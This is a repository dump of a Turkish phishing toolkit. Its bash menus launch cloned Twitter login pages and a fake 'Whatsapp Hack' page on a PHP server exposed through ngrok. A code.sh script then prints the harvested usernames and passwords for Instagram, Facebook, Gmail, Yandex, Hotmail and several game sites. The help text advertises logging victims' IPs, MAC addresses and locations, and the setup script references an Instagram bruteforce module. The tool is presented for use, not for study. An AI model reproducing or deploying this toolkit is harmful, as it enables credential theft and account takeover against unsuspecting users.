Arttırma hilesi
    ================================================ FILE: Site/Twitter/Site-phishing/index.php ================================================ Twitter'dan Giriş yap İçeriğe geç
    • Konumu olan Tweet

      Tweetlerine web veya üçüncü parti uygulamalar aracılığıyla şehir veya tam konum gibi konum bilgisi ekleyebilirsin. Tweet konum geçmişini dilediğin zaman silebilirsiniz. Daha fazla bilgi al

      ================================================ FILE: Site/Twitter/start.sh ================================================ !/bin/bash #Code:Yaman Efkar #Türk Siber Timi #İnstagram : @turksibertimi #Youtube : YamanEfkar clear echo -e " \e[35m ((( #Türk Siber Timi #Yaman Efkar ))) \e[31m[01]\e[32m Twitter Login \e[31m[02]\e[32m Twitter Fake Panel \e[31m[00]\e[37m Menü \e[31m[99]\e[37m Exit " echo -e "\e[49m" read -p "İşlem Numarasını Giriniz: " islem if [[ $islem == 1 || $islem == 01 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: twitter01" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-phishing/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 2 || $islem == 02 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: twitter02" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-fakepanel/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 0 || $islem == 00 ]]; then cd .. cd .. bash tst.sh elif [[ $islem == 9 || $islem == 99 ]]; then echo -e "\e[31mTürk Siber Timi İyi Günler Diler :)) ßß" sleep 1 clear exit 1 else echo "" echo -e "\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz...." sleep 3 clear bash start.sh fi ================================================ FILE: Site/Whatsapp/Site/index.php ================================================ -- Whatsapp Hack --

      Whatsapp Hack

      Number

      Your number

      Victim's number





      ================================================ FILE: Site/Whatsapp/start.sh ================================================ #!/bin/bash clear echo -e '\033[32;40;1m /\︵-︵/\ |( ◉)(◉)| \ ︶V︶ / /↺↺↺↺↺↺↺\ ↺↺↺↺↺↺↺↺| \↺↺↺↺↺↺↺/ ¯¯/\¯/\¯¯ \033[31;40;1m[01]\e[37mWhatsapp Hack \e[31m[00]\e[37m Menü \e[31m[99]\e[37m Exit ' echo -e "\033[32;40;1m ~~~Yaman Efkar~~~" echo "" read -p "İslem Numarası : " islem if [[ $islem == 1 || $islem == 01 ]]; then read -p "Port Numarası Giriniz : " port sleep 3 echo "" echo -e "\e[33mCode: whatsapp01" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 9 || $islem == 99 ]]; then clear echo -e "\e[31mTürk Siber Timi İyi Günler Diler :)) ßß" sleep 1 exit 1 elif [[ $islem == 00 ]]; then cd .. cd .. bash tst.sh else echo -e '\033[31;40;1m İslem Numaranızı Kontrol Ediniz!' sleep 2 clear bash start.sh fi ================================================ FILE: Site/code.sh ================================================ #!/bin/bash clear echo -e " \e[35m ((( #Türk Siber Timi #Yaman Efkar ))) " echo -e "\e[31m" read -p "Kodunuzu Yazınız: " islem if [[ $islem == "insta01" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Instagram/Instagram-phishing/username-phishing.txt elif [[ $islem == "insta02" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Instagram/Instagram-fakepanel/username-fakepanel.txt elif [[ $islem == "twitter01" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Twitter/Site-phishing/user.txt elif [[ $islem == "twitter02" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Twitter/Site-fakepanel/twitter.txt elif [[ $islem == "whatsapp01" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Whatsapp/Site/code.txt elif [[ $islem == "face01" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Facebook/Site-facebook/facebook.txt elif [[ $islem == "face02" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Facebook/Site-fakepanel/fakepanel.txt elif [[ $islem == "mail01" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Mail/Site-gmail/gmail.txt elif [[ $islem == "mail02" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Mail/Site-yandex/yandex.txt elif [[ $islem == "mail03" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Mail/Site-hotmail/hotmail.txt elif [[ $islem == "game01" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Game/Site-wolfteam/wolfteam.txt elif [[ $islem == "game02" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Game/Site-legend/legendonline.txt elif [[ $islem == "game03" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Game/Site-pubg/pubg.txt elif [[ $islem == "game04" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Game/Site-zula/zula.txt elif [[ $islem == "game05" ]]; then sleep 1 echo "" echo -e "\e[33mVeriler Geliyor...." sleep 2 echo -e "\e[37m" cat Game/Site-lol/lol.txt else clear echo -e "\e[31mYanlış Kod Girdiniz...." sleep 3 bash code.sh fi echo -e "\e[31m" read -p "Ana Menüye Dönmek İçin Entere Basınız...." non cd .. bash tst.sh ================================================ FILE: ngrok ================================================ [File too large to display: 13.1 MB] ================================================ FILE: requirements.sh ================================================ #!/bin/bash apt update && apt upgrade -y pkg install termux-api -y apt install curl -y apt install wget -y apt install python -y apt install python2 -y apt install php -y apt install cat chmod 777 * rm -rf /data/data/com.termux/files/usr/bin/ngrok mv -v ngrok /data/data/com.termux/files/usr/bin cd Site/Instagram/Instagram-bruteforce/ pip install -r requirements.txt python2 install.py install termux-open-url https://www.instagram.com/yamanefkarr/ echo -e '\033[31;40;1m Kurulum Bitti!!!' sleep 1 ================================================ FILE: tst.sh ================================================ #!/bin/bash #!/bin/sh #Code:Yaman Efkar #Türk Siber Timi #İnstagram : @turksibertimi #Youtube : YamanEfkar clear case $1 in "--help") sleep 1 echo -e " --help & --h (Yardım Menüsünü Çağırır) --ıp & --ip (Giriş Yapmış Kişilerin Ip Adresini Listeler) --user (Giriş Yapılmış Username & Pass) --mac (Giriş Yapanların Mac Adresleri) --location (Belirtilen Ip Adresinin Yer Tespiti) bash yaman.sh & sh yaman.sh (Phishing Toolu 'nu Çalıştırır) " ;; "--h") sleep 1 echo -e " --help & --h (Yardım Menüsünü Çağırır) --ıp & --ip (Giriş Yapmış Kişilerin Ip Adresini Listeler) --user (Giriş Yapılmış Username & Pass) --mac (Giriş Yapanların Mac Adresleri) --location (Belirtilen Ip Adresinin Yer Tespiti) bash yaman.sh & sh yaman.sh (Phishing Toolu 'nu Çalıştırır)" ;; esac banner(){ echo -e '\033[31;40;1m ────────────────█████████─────────────── ──────────────█████████████───────────── ───────────███████████████████────────── ──────────────────────────────────────── ────────████████████████████████──────── ────────████████████████████████──────── ──────────────────────────────────────── █████████─████████████████████─█████████ █████████─████████████████████─█████████ ███───────████████────████████───────███ ███───────██████───██───██████───────███ ─███──────█████──████────█████──────███─ ──███─────████─────██─────████─────███── ───███────████─────██─────████────███─── ────███───█████────██────█████───███──── ─────███──█████────██────█████──███───── ──────███─███████──────███████─███────── ───────██─████████████████████─██─────── ────────█─████████████████████─█──────── ──────────────────────────────────────── ──────────████████████████████────────── ───────────██████████████████─────────── ─────────────██████████████───────────── ───────────────███████████────────────── ──────────────────────────────────────── ────────────────█████████─────────────── ──────────────█████████████───────────── \e[35m☾★ ☾★ ☾★ ☾★ YamanEfkar ☾★ ☾★ ☾★ ☾★ \e[31m☾★ ☾★ ☾★ ☾★ Türk Siber Timi ☾★ ☾★ ☾★ ☾★ \e[32m☾★ ☾★ ☾★ ☾★ İnstagram : @turksibertimi ☾★ ☾★ ☾★ ☾★ ' echo -e ' \e[31m[01]\e[32mİnstagram \e[31m[04]\e[32mFacebook \e[31m[02]\e[32mTwitter \e[31m[05]\e[32mMail \e[31m[03]\e[32mWhatsapp \e[31m[06]\e[32mGame (Oyunlar) \e[31m[00] Code \e[31m[99] Çıkış ' read -p "İşlem Numarası:" islem } banner if [[ $islem == 1 || $islem == 01 ]]; then sleep 1 clear cd Site/Instagram/ bash start.sh elif [[ $islem == 2 || $islem == 02 ]]; then sleep 1 clear cd Site/Twitter/ bash start.sh elif [[ $islem == 3 || $islem == 03 ]]; then sleep 1 clear cd Site/Whatsapp/ bash start.sh elif [[ $islem == 4 || $islem == 04 ]]; then sleep 1 clear cd Site/Facebook/ bash start.sh elif [[ $islem == 5 || $islem == 05 ]]; then sleep 1 clear cd Site/Mail/ bash start.sh elif [[ $islem == 6 || $islem == 06 ]]; then sleep 1 clear cd Site/Game/ bash start.sh elif [[ $islem == 00 ]]; then cd Site/ bash code.sh elif [[ $islem == 99 ]]; then exit 1 else echo -e '\033[36;40;1m Girdiğniz İşlem Numarasını Kontrol Ediniz....' sleep 1 clear banner fi